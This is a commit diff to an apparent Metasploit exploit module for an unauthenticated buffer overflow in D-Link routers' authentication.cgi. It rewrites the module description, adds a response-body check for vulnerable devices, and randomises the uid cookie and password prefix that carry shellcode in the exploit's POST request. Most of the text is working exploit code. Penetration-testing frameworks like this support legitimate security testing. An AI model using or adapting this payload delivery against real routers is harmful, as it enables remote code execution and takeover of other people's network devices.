Do some randomizations

2014-06-20 11:38:10 -05:00 · 2014-06-20 11:38:10 -05:00 · f0d04fe77e
parent f26f8ae5db
commit f0d04fe77e
1 changed files with 10 additions and 10 deletions
--- a/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb
+++ b/modules/exploits/linux/http/dlink_authentication_cgi_bof.rb
@ -17,10 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote
    super(update_info(info,
      'Name'           => 'D-Link authentication.cgi Buffer Overflow',
      'Description'    => %q{
-          This module exploits an anonymous remote code execution vulnerability on different D-Link routers.
-        This module has been tested successfully on D-Link DIR645A1_FW103B11. Different other devices like the
-        DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable and they were tested within an emulated
-        environment. They are a little bit different in the first ROP gadget.
+        This module exploits an remote buffer overflow vulnerability on different D-Link routers.
+        The vulnerability exists in the handling of HTTP queries to the authentication.cgi with
+        long password values. The vulnerability can be exploitable without authentication. This
+        module has been tested successfully on D-Link firmware DIR645A1_FW103B11. Other firmwares
+        like the DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable.
      },
      'Author'         =>
        [
@ -63,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
        'method'  => 'GET'
      })

-      if res && [200, 301, 302].include?(res.code)
+      if res && [200, 301, 302].include?(res.code) && res.body.to_s =~ /status.*uid/
        return Exploit::CheckCode::Detected
      end
    rescue ::Rex::ConnectionError
@ -113,17 +114,16 @@ class Metasploit3 < Msf::Exploit::Remote

  def execute_command(cmd, opts)
    shellcode = prepare_shellcode(cmd)
-
+    uid = rand_text_alpha(4)
    begin
      res = send_request_cgi({
        'method' => 'POST',
-        #'uri' => "/authentication_gdb.cgi",	#for debugging on the router
        'uri' => "/authentication.cgi",
-        'cookie'   => "uid=test",
+        'cookie'   => "uid=#{uid}",
        'encode_params' => false,
        'vars_post' => {
-          'uid'        => 'test',
-          'password'   => 'asd' << shellcode,
+          'uid'      => uid,
+          'password' => rand_text_alpha(3) + shellcode,
        }
      })
      return res